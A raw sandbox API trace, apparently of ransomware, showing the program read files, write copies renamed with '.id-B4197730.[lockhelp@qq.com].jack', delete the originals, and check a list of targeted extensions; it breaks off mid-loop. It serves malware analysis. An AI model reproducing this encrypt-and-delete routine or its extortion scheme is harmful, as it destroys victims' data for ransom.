(lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.967] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.968] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.968] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0197.968] GetLastError () returned 0x0 [0197.968] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xed0c, lpOverlapped=0x0) returned 1 [0198.005] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xed10, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xed10, lpOverlapped=0x0) returned 1 [0198.007] ReadFile (in: hFile=0x420, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.007] WriteFile (in: hFile=0x3d4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.008] SetEndOfFile (hFile=0x3d4) returned 1 [0198.008] CloseHandle (hObject=0x3d4) returned 1 [0198.010] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.010] SetEndOfFile (hFile=0x420) returned 1 [0198.011] CloseHandle (hObject=0x420) returned 1 [0198.011] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.012] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 1 [0198.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.012] lstrlenW (lpString=".doc") returned 4 [0198.388] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.388] lstrlenW (lpString=".docx") returned 5 [0198.388] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.388] lstrlenW (lpString=".pdf") returned 4 [0198.388] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.388] lstrlenW (lpString=".xls") returned 4 [0198.388] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.388] lstrlenW (lpString=".xlsx") returned 5 [0198.388] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.388] lstrlenW (lpString=".ppt") returned 4 [0198.388] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.388] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.388] lstrlenW (lpString=".zip") returned 4 [0198.388] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.389] lstrlenW (lpString=".rar") returned 4 [0198.389] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString=".bz2") returned 4 [0198.389] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString=".7z") returned 3 [0198.389] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.389] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.389] lstrlenW (lpString=".dbf") returned 4 [0198.389] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.389] lstrlenW (lpString=".1cd") returned 4 [0198.389] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.389] lstrlenW (lpString=".jpg") returned 4 [0198.389] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.389] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.389] lstrlenW (lpString=".doc") returned 4 [0198.389] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString=".docx") returned 5 [0198.389] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.389] lstrlenW (lpString=".pdf") returned 4 [0198.389] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString=".xls") returned 4 [0198.389] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.389] lstrlenW (lpString=".xlsx") returned 5 [0198.389] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.389] lstrlenW (lpString=".ppt") returned 4 [0198.390] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.390] lstrlenW (lpString=".zip") returned 4 [0198.390] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.390] lstrlenW (lpString=".rar") returned 4 [0198.390] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.390] lstrlenW (lpString=".bz2") returned 4 [0198.390] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.390] lstrlenW (lpString=".7z") returned 3 [0198.390] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.390] lstrlenW (lpString=".dbf") returned 4 [0198.390] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.390] lstrlenW (lpString=".1cd") returned 4 [0198.390] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0198.390] lstrlenW (lpString=".jpg") returned 4 [0198.390] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.390] lstrcmpiW (lpString1=".html", lpString2=".jack") returned -1 [0198.390] lstrlenW (lpString="DHtmlHeader.html") returned 16 [0198.390] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.391] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=16118) returned 1 [0198.391] CloseHandle (hObject=0x3b8) returned 1 [0198.391] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 0x80 [0198.391] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.391] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.391] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.391] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.392] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.392] GetLastError () returned 0x0 [0198.392] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x3ef6, lpOverlapped=0x0) returned 1 [0198.394] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x3f00, lpOverlapped=0x0) returned 1 [0198.396] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.396] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0198.396] SetEndOfFile (hFile=0x404) returned 1 [0198.396] CloseHandle (hObject=0x404) returned 1 [0198.401] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.401] SetEndOfFile (hFile=0x3b8) returned 1 [0198.402] CloseHandle (hObject=0x3b8) returned 1 [0198.402] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.403] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 1 [0198.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.403] lstrlenW (lpString=".doc") returned 4 [0198.403] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0198.403] lstrlenW (lpString=".docx") returned 5 [0198.403] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0198.403] lstrlenW (lpString=".pdf") returned 4 [0198.403] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0198.403] lstrlenW (lpString=".xls") returned 4 [0198.407] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0198.408] lstrlenW (lpString=".xlsx") returned 5 [0198.408] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0198.408] lstrlenW (lpString=".ppt") returned 4 [0198.408] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString=".zip") returned 4 [0198.408] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0198.408] lstrlenW (lpString=".rar") returned 4 [0198.408] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0198.408] lstrlenW (lpString=".bz2") returned 4 [0198.408] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0198.408] lstrlenW (lpString=".7z") returned 3 [0198.408] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString=".dbf") returned 4 [0198.408] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString=".1cd") returned 4 [0198.408] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString=".jpg") returned 4 [0198.408] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.408] lstrlenW (lpString=".doc") returned 4 [0198.408] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".docx") returned 5 [0198.409] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0198.409] lstrlenW (lpString=".pdf") returned 4 [0198.409] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".xls") returned 4 [0198.409] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".xlsx") returned 5 [0198.409] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0198.409] lstrlenW (lpString=".ppt") returned 4 [0198.409] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0198.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.409] lstrlenW (lpString=".zip") returned 4 [0198.409] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".rar") returned 4 [0198.409] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".bz2") returned 4 [0198.409] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0198.409] lstrlenW (lpString=".7z") returned 3 [0198.409] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0198.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.409] lstrlenW (lpString=".dbf") returned 4 [0198.409] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0198.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.409] lstrlenW (lpString=".1cd") returned 4 [0198.409] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0198.409] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0198.409] lstrlenW (lpString=".jpg") returned 4 [0198.409] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0198.419] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.419] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0198.419] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.419] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=93314) returned 1 [0198.419] CloseHandle (hObject=0x3b8) returned 1 [0198.420] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 0x80 [0198.420] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.420] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.420] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.420] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.420] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.420] GetLastError () returned 0x0 [0198.420] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x16c82, lpOverlapped=0x0) returned 1 [0198.816] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x16c90, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x16c90, lpOverlapped=0x0) returned 1 [0198.818] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.818] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.818] SetEndOfFile (hFile=0x404) returned 1 [0198.819] CloseHandle (hObject=0x404) returned 1 [0198.825] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.826] SetEndOfFile (hFile=0x3b8) returned 1 [0198.830] CloseHandle (hObject=0x3b8) returned 1 [0198.830] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.831] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 1 [0198.831] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.831] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.831] lstrlenW (lpString=".doc") returned 4 [0198.831] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.831] lstrlenW (lpString=".docx") returned 5 [0198.831] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.831] lstrlenW (lpString=".pdf") returned 4 [0198.831] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.831] lstrlenW (lpString=".xls") returned 4 [0198.831] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.831] lstrlenW (lpString=".xlsx") returned 5 [0198.831] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.831] lstrlenW (lpString=".ppt") returned 4 [0198.831] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString=".zip") returned 4 [0198.832] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.832] lstrlenW (lpString=".rar") returned 4 [0198.832] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString=".bz2") returned 4 [0198.832] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString=".7z") returned 3 [0198.832] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString=".dbf") returned 4 [0198.832] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString=".1cd") returned 4 [0198.832] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString=".jpg") returned 4 [0198.832] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.832] lstrlenW (lpString=".doc") returned 4 [0198.832] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.832] lstrlenW (lpString=".docx") returned 5 [0198.832] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.832] lstrlenW (lpString=".pdf") returned 4 [0198.832] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString=".xls") returned 4 [0198.833] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString=".xlsx") returned 5 [0198.833] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.833] lstrlenW (lpString=".ppt") returned 4 [0198.833] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.833] lstrlenW (lpString=".zip") returned 4 [0198.833] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.833] lstrlenW (lpString=".rar") returned 4 [0198.833] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString=".bz2") returned 4 [0198.833] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString=".7z") returned 3 [0198.833] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.833] lstrlenW (lpString=".dbf") returned 4 [0198.833] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.833] lstrlenW (lpString=".1cd") returned 4 [0198.833] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.833] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0198.833] lstrlenW (lpString=".jpg") returned 4 [0198.833] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.834] lstrcmpiW (lpString1=".LOG", lpString2=".jack") returned 1 [0198.834] lstrlenW (lpString="BCD.LOG") returned 7 [0198.834] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0198.834] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.834] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.834] lstrlenW (lpString=".doc") returned 4 [0198.834] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0198.834] lstrlenW (lpString=".docx") returned 5 [0198.834] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0198.834] lstrlenW (lpString=".pdf") returned 4 [0198.834] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0198.834] lstrlenW (lpString=".xls") returned 4 [0198.834] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0198.834] lstrlenW (lpString=".xlsx") returned 5 [0198.834] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0198.834] lstrlenW (lpString=".ppt") returned 4 [0198.834] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0198.834] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.834] lstrlenW (lpString=".zip") returned 4 [0198.834] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0198.834] lstrlenW (lpString=".rar") returned 4 [0198.834] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0198.834] lstrlenW (lpString=".bz2") returned 4 [0198.834] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0198.834] lstrlenW (lpString=".7z") returned 3 [0198.835] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0198.835] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.835] lstrlenW (lpString=".dbf") returned 4 [0198.835] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0198.835] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.835] lstrlenW (lpString=".1cd") returned 4 [0198.835] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0198.835] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.835] lstrlenW (lpString=".jpg") returned 4 [0198.835] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0198.835] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.835] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.835] lstrlenW (lpString=".doc") returned 4 [0198.836] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0198.836] lstrlenW (lpString=".docx") returned 5 [0198.836] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0198.836] lstrlenW (lpString=".pdf") returned 4 [0198.836] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0198.836] lstrlenW (lpString=".xls") returned 4 [0198.836] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0198.836] lstrlenW (lpString=".xlsx") returned 5 [0198.836] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0198.836] lstrlenW (lpString=".ppt") returned 4 [0198.836] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0198.836] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.836] lstrlenW (lpString=".zip") returned 4 [0198.836] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0198.836] lstrlenW (lpString=".rar") returned 4 [0198.836] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0198.836] lstrlenW (lpString=".bz2") returned 4 [0198.836] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0198.836] lstrlenW (lpString=".7z") returned 3 [0198.836] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0198.836] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.836] lstrlenW (lpString=".dbf") returned 4 